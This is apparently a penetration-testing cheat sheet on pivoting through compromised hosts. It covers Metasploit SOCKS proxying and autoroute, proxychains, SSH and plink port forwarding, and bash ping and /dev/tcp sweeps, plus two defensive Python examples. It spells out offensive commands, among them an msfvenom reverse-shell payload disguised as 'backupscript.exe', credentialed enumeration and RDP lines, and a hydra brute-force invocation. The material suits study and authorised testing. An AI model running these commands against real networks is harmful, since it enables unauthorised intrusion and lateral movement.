
Pivoting and double pivoting

In this section we set up a SOCKS4a proxy with Metasploit, configure Proxychains4 to route tool traffic through it, and then cover pivoting and double pivoting with SSH port forwarding.

Setting Up SOCKS4a Proxy and Proxychains

  • Configure Metasploit's SOCKS4a Proxy Service:

    use auxiliary/server/socks4a
    set SRVPORT 9050
    run

    These commands start a SOCKS4a proxy server on port 9050 inside Metasploit (run is required to actually start the listener).

  • Configure Proxychains4:

    cat /etc/proxychains4.conf
    socks4 127.0.0.1 9050

    Edit the Proxychains configuration file so that its [ProxyList] entry points at localhost, port 9050. The proxy type must match the server you started: socks4 for the socks4a module above (use socks5 only when the Metasploit proxy is started as a SOCKS5 server).

Verify Proxy Service and Use Proxychains with Nmap

  • Verify the Process Running:

    netstat -atn

    Use netstat to verify the proxy service is running on the desired port.

  • Scan Network via Proxychains Using Nmap:

    proxychains nmap -sT -Pn <TARGET_IP>
    proxychains nmap -sT -Pn -sV -sC -p 21,80,443,445 <TARGET_IP>

    Use Proxychains with Nmap to scan a target through the proxy. A SOCKS proxy only relays TCP streams, so use full connect scans (-sT) and skip host discovery (-Pn); SYN scans and ICMP pings do not traverse the proxy.

Pivoting and Network Scanning

  • Set Up Autoroute via Metasploit Session:

    use post/multi/manage/autoroute
    set session <SESSION_ID>
    exploit

    Configure autoroute for a Metasploit session to route traffic through a compromised machine's subnet.

Enumeration and Remote Desktop Protocol (RDP) via proxychains

  • Run Enumeration with Proxychains:

    sudo proxychains -q enum4linux -a -u administrator -p 'Pa$$w0rd' 192.168.5.100

    Use Proxychains to run the enum4linux script, targeting a specific machine for enumeration.

  • Use RDP via Proxychains:

    proxychains rdesktop -u administrator -p 'Pa$$w0rd123' 192.168.5.100:3389

    Connect to a machine using Remote Desktop Protocol through Proxychains.

SSH Port Forwarding

  • Perform Multiple Local Port Forwardings with SSH:

    ssh root@192.168.110.10 -L 3389:192.168.110.138:3389 -L 5985:192.168.110.138:5985 -L 5986:192.168.110.131:5985

    Forward several ports of hosts behind the pivot (192.168.110.138 and 192.168.110.131) to your local machine through a single SSH session to the pivot (192.168.110.10). Each -L takes LOCAL_PORT:REMOTE_HOST:REMOTE_PORT, so the third mapping exposes 192.168.110.131:5985 on local port 5986 to avoid a clash with the second.

  • Perform Simple Port Forwarding:

    ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN

    Forward port 80 of the target host (172.16.0.10) to port 8000 on the local machine, running SSH in the background with -fN.

Reverse Shell and Port Forwarding with Metasploit via pivoting

This guide demonstrates how to set up a remote port forwarding configuration and generate a Meterpreter payload for penetration testing.

  1. Remote Port Forwarding Setup:

    Use SSH to set up remote port forwarding. This enables rerouting connections from a remote server to a local service. Binding the listener to a specific address on the remote side (as the first command does) requires GatewayPorts yes or GatewayPorts clientspecified in that host's sshd_config; otherwise sshd binds the forwarded port to loopback only.

    ssh -R 192.168.5.45:4444:0.0.0.0:4444 vagrant@192.168.56.200 -vN

    Now, forward traffic to another internal pivot host by specifying the internal IP and desired port:

    ssh -R <InternalIPPivotHost>:8080:0.0.0.0:8000 ubuntu@<TargetIP> -vN

  2. Generate Meterpreter Payload:

    Create a reverse HTTPS Meterpreter payload using msfvenom. This payload should connect back to your pivot host's internal IP.

    msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

Note: Ensure you replace <InternalIPPivotHost> and <TargetIP> with actual IP addresses. Remember to set the internal IP of the pivot host as LHOST during the payload creation.

  • Meterpreter Commands for Port Forwarding:

    portfwd
    route
    arp
    getproxy

    • portfwd: Forward a port of the remote machine through the Meterpreter session.

    • route: Manage routes within Metasploit.

    • arp: View or manipulate the ARP cache.

    • getproxy: Display the current proxy configuration of the compromised host.

Reverse port forwarding

Reverse port forwarding is useful when you have a shell on a machine but no SSH access to it: instead of connecting in, the target opens an SSH tunnel back to your attacking box, and the forwarded port then appears on your side. Follow these steps.

# Generate an SSH key pair if you don't have one
ssh-keygen

Explanation: This command creates a private and public SSH key pair, essential for secure connections.

# Edit the authorized keys on your machine to restrict the key to port forwarding only
echo 'command="echo This account can only be used for port forwarding",no-agent-forwarding,no-x11-forwarding,no-pty ssh-rsa ...' >> ~/.ssh/authorized_keys

Explanation: This restriction ensures the key is only used for port forwarding, preventing shell access to your attacking machine.

# Check the status of the SSH service
sudo systemctl status ssh

Explanation: Use this command to ensure the SSH service is running correctly on your system.

# Optionally, kill a specific SSH connection if needed
sudo kill [PID]

Explanation: Replace [PID] with the process ID of the SSH connection you wish to terminate.

# Set up reverse port forwarding
# ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN
ssh -R 2222:172.16.0.100:22 kali@172.16.0.200 -i id_rsa -fN

Explanation: Run on the target, this command opens port 2222 on your attacking machine (172.16.0.200) and sends anything that connects to it back through the tunnel to port 22 of the remote machine (172.16.0.100), authenticating with the keyfile id_rsa. The port order follows the template above: the listening port on your side comes first. The -fN option backgrounds the session after setting up the tunnel, so the target's shell is not tied up.
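As an added example (not part of this page), a short Python audit that checks an authorized_keys file for the forwarding-only restrictions described above, so a key handed out for a tunnel cannot be used for an interactive login on your attacking box; the sample file and its key blobs are constructed placeholders.

```python
"""Audit an authorized_keys file for forwarding-only restrictions (added
example, not from the original page). A key handed to a pivot host should
carry a forced command plus no-pty, no-agent-forwarding and
no-x11-forwarding (or the newer 'restrict' option, which implies the
no-* set), so it cannot become an interactive login on the attacking
box. The sample file is constructed and its key blobs are placeholders."""
REQUIRED = {"no-pty", "no-agent-forwarding", "no-x11-forwarding"}
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256", "ssh-dss")

SAMPLE = """\
# keys for the pivot tunnel (constructed sample)
command="echo This account can only be used for port forwarding",no-agent-forwarding,no-x11-forwarding,no-pty ssh-rsa AAAAB3PLACEHOLDER pivot@kali
ssh-ed25519 AAAAC3PLACEHOLDER admin@laptop
no-pty ssh-rsa AAAAB3PLACEHOLDER half@restricted
"""


def split_field(text, on_space):
    """Split on whitespace (or commas) while keeping double-quoted values intact."""
    out, cur, quoted = [], "", False
    for ch in text:
        quoted ^= ch == '"'
        if not quoted and (ch.isspace() if on_space else ch == ","):
            out.append(cur)
            cur = ""
        else:
            cur += ch
    out.append(cur)
    return [o for o in out if o]


def audit_line(line):
    """Return (key comment, missing restrictions), or None for blank/comment lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = split_field(line, True)
    # The options field, if present, is everything before the key type.
    options = [] if parts[0] in KEY_TYPES else split_field(parts.pop(0), False)
    names = {o.split("=", 1)[0] for o in options}
    missing = [] if "restrict" in names else sorted(REQUIRED - names)
    if "command" not in names:
        missing.insert(0, "command=")
    return (parts[2] if len(parts) > 2 else parts[0]), missing


def audit(text):
    """Map each key (by its comment) to the list of restrictions it lacks."""
    return dict(r for r in map(audit_line, text.splitlines()) if r)


if __name__ == "__main__":
    for key, missing in audit(SAMPLE).items():
        print(key, "OK" if not missing else "missing " + ", ".join(missing))
```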

Discover hosts through a pivot using Living Of The Land tools

This is useful if the target does not have nmap installed or if you do not want to make a lot of noise while scanning the internal network. Instead, use the Living Off The Land tools that are already built in.

  1. Linux: Discovering Live Hosts on a Network:

    This Bash one-liner pings each IP address from 192.168.1.1 to 192.168.1.255 in the background and reports any host that answers.

for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done

  2. Linux: Scanning Open Ports on a Target:

    This command attempts a TCP connection to each port from 1 to 65535 on the target IP (192.168.1.1) using Bash's built-in /dev/tcp pseudo-device and reports any port that accepts the connection.

for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo "$i is open"; done
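From the blue-team side, the two loops above leave a very recognisable footprint: one source touching many hosts, then one source touching many ports on one host. As an added example (not part of this page), a small Python sliding-window detector over constructed connection records; the record format and the thresholds are assumptions.

```python
"""Detect the host sweep and port sweep above in connection records
(added example, not from the original page). Each record is
"epoch src dst proto dport"; a source that reaches many distinct hosts
inside the window (the ping loop) or many distinct TCP ports on one host
(the /dev/tcp loop) raises an alert. Records and thresholds are
constructed assumptions; tune them to the network being monitored."""
from collections import defaultdict

WINDOW = 60      # seconds of history kept per source
HOST_LIMIT = 20  # distinct destination hosts from one source
PORT_LIMIT = 50  # distinct TCP ports on one destination

# Constructed sample: 192.168.1.50 pings 30 hosts, then probes 60 ports
# on 192.168.1.1; 192.168.1.7 is ordinary SMB traffic.
SAMPLE = [f"{1700000000 + i} 192.168.1.50 192.168.1.{i + 1} icmp 0" for i in range(30)]
SAMPLE += [f"{1700000100 + i} 192.168.1.50 192.168.1.1 tcp {i + 1}" for i in range(60)]
SAMPLE += ["1700000050 192.168.1.7 192.168.1.10 tcp 445",
           "1700000051 192.168.1.7 192.168.1.10 tcp 139"]


def detect(records, window=WINDOW, host_limit=HOST_LIMIT, port_limit=PORT_LIMIT):
    """Return sorted (src, kind, target) alerts; each alert is reported once."""
    events = sorted((int(ts), src, dst, proto, int(port))
                    for ts, src, dst, proto, port in (r.split() for r in records))
    recent = defaultdict(list)  # src -> events still inside the sliding window
    alerts = set()
    for ev in events:
        ts, src, dst, proto, port = ev
        win = recent[src]
        win.append(ev)
        while ts - win[0][0] > window:   # expire old events for this source
            win.pop(0)
        if len({e[2] for e in win}) > host_limit:
            alerts.add((src, "host-sweep", "*"))
        ports = {e[4] for e in win if e[2] == dst and e[3] == "tcp"}
        if len(ports) > port_limit:
            alerts.add((src, "port-sweep", dst))
    return sorted(alerts)


if __name__ == "__main__":
    for src, kind, target in detect(SAMPLE):
        print(f"{src}: {kind} against {target}")
```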

Pivoting and double pivoting (SSH Dynamic port forwarding)

To configure SSH dynamic port forwarding, use the following commands:

  1. Edit /etc/proxychains4.conf

    Add the following line so that proxychains sends traffic to a SOCKS5 proxy on your localhost, port 1080:

cat /etc/proxychains4.conf
socks5 127.0.0.1 1080

  2. Initiate Dynamic Port Forwarding

To set up dynamic port forwarding over SSH, use the following command. This example listens on port 1080 and forwards traffic through the specified username@hostname:

ssh -D 1080 username@hostname

This command establishes an SSH tunnel that acts as a SOCKS proxy, allowing you to route traffic through the pivot host.

  3. Add Options for Background Operation

    To run the SSH session in the background, which is useful for maintaining the tunnel without keeping an active terminal session open, use the -f option:

    ssh -D 1080 -f -C -q -N username@hostname

    • -f: Requests SSH to go to the background just before command execution.

    • -C: Enables compression of data, if possible.

    • -q: Quiet mode; suppresses most warning and diagnostic messages.

    • -N: Tells SSH not to execute a remote command, useful for just forwarding ports.

  4. Proxychains <TOOL>

    Once the tunnel is established we can use proxychains with our favorite tool to reach the internal network. For a double pivot, open a second -D tunnel from the first pivot to the second (run that ssh command through proxychains, on a different local port) and list both proxies in [ProxyList]; proxychains then chains them in order.

proxychains curl http://192.168.69.102
proxychains nmap -sT -Pn <TARGET_IP>
proxychains hydra <HYDRA_OPTIONS> <TARGET_IP>

Plink.exe - Windows only

Plink.exe is a Windows command line version of the PuTTY SSH client. Now that Windows ships with its own built-in SSH client, plink is less useful on modern systems; however, it is still a very useful tool, so we will cover it here.

1. Reverse Port Forwarding Template

# Creates a reverse port forward from the target to your attacking box
# (echo y answers the host-key prompt, which cannot be answered from a non-interactive shell)
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N

2. Example of Reverse Port Forwarding

# Forwards a connection from 172.16.0.10:80 to port 8000 on your attacking machine (172.16.0.20)
cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -N

3. Convert SSH Key for Plink

# Converts an SSH key to a format usable by Plink
puttygen KEYFILE -o OUTPUT_KEY.ppk

4. Install putty-tools on Kali Linux

# Installs the putty-tools package on Kali Linux
sudo apt install putty-tools

These commands cover the process of setting up reverse port forwarding using plink.exe, converting SSH keys for use with Plink, and installing necessary tools on Kali Linux.


Last updated 6 months ago
